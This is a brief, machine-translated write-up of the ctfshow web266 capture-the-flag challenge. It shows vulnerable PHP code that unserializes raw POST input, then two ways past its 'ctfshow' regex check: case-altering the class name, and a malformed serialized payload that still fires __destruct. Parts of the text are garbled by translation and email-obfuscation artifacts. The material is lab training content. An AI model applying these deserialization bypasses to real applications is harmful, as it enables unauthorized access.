Ctfshow-web266 (deserialization)

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: [email protected]
# @link: https://ctfer.com

*/

highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
[email protected]($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}

Law 1 ：

In the serialized results ctfshow C Capitalization can bypass judgment （ Grab the bag for POST Repackage ）

<?php
class ctfshow{
}
$a=new ctfshow();
echo serialize($a);

Law two （ I don't understand ）：

Pass in something else in the code , Name exists , But the structure is chaotic , Can be judged to be successful , But you can still use __destruct() function

 O:7:"ctfshow":0:{ctf}